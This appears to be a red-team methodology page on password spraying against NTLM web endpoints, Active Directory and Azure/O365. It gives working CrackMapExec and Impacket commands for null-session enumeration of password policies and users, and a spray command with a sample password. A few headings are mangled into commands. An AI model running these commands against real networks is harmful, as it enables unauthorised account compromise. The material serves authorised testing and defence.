Secondary Categories: 02 - Initial Access 02 - Credential Access 02 - Privilege Escalation 02 - Lateral Movement Links: Common Password List
Description:
There are some applications that allow for users or applications such as browser authenticate over HTTP using NTLM. In order to find thes application we can use a tool such as NTLMRecon to find endpoints to try a password spray against the endpoints.
NTLM Recon outputs a CSV list of the endpoints it identified that can be passed to SprayCharles for attempting to gain access to a account
External
This section contains some of my emthodology and tips for performing password spraying attacks from an external attackers prespective.
There are a lot of great open source tools out there to do this. I suggest using TREVORspray.
Using this tool you can use a round-robin cycle through multiple different SSH sessions, uses multiple modules/methods to spray, spoof the User-Agent, set delay/jitter.
For a list of Common Password please refer to: Common Password List
Internal
When conducting internal password spraying it is important to keep in mind that this action is very loud. I also highly recommend to enumerate the domainβs password policy before beginning.
Password Policy
Enumerate Password Policy
# Get Password Policy with CrackMapExec (Unauthenticated)
cme smb $dc -u '' -p ''
# Get Password Policy with CrackMapExec
crackmapexec smb $dc -u $username -p $password --pass-pol
# Get Password Policy with Net Accounts
net accountsshe
# Enumerate the default password policy settings from the Default Domain Policy GPO
Get-ADDefaultDomainPasswordPolicyFine-Grained Password Policy;
# Enumerate all FGPPs configured
Get-ADFineGrainedPasswordPolicy -Filter *
# Obtain the FGPP assigned to a specific user
Get-ADUserResultantPasswordPolicy -Identity JSmithGathering Domain Users
Once you have enumerated the password policy if you donβt already have a list of all domain users I recommend gathering this information next.
# Get List of Users with CrackMapExec via RID Cycling (Unauthenticated)
crackmapexec smb $dc -u '' -p '' --users
crackmapexec smb $dc -u '' -p '' --groups
# Get List of Users with CrackMapExec via RID Cycling
crackmapexec smb $dc -u $username -p $password --users
# Get List of Users with Impacket
impacket-GetADUsers $domain/$username:$password -all -dc-ip $dcSpraying
# Spray with CrackMapExec
crackmapexec smb $ip -u $username_list -p Winter2022! --continue-on-successAzure
The tools listed below provide several ways to enumerate and password spray in a few different formats
- activesync
- adfs
- autodiscover
- autologon
- oauth2
- reporting
- rst
Resources:
| Title | URL |
|---|---|
| NTLMRecon | https://github.com/pwnfoo/NTLMRecon |
| SprayCharles | https://github.com/Tw1sm/spraycharles |
| Password Spraying | https://www.sprocketsecurity.com/blog/how-to-bypass-mfa-all-day |
| Creating a fine grained password policy | https://specopssoft.com/blog/create-fine-grained-password-policy-active-directory/ |
| Azure AD Password Spray Attacks with PowerShell and How to Defend your Tenant | https://danielchronlund.com/2020/03/17/azure-ad-password-spray-attacks-with-powershell-and-how-to-defend-your-tenant/ |
| MSOLSpray Github | https://github.com/dafthack/MSOLSpray |
| o365Spray tool | https://github.com/0xZDH/o365spray |
| o365enum tool | https://github.com/gremwell/o365enum |
| UhOh365 | https://github.com/Raikia/UhOh365 |
| MailSniper | https://github.com/dafthack/MailSniper |
| Ruler | https://github.com/sensepost/ruler |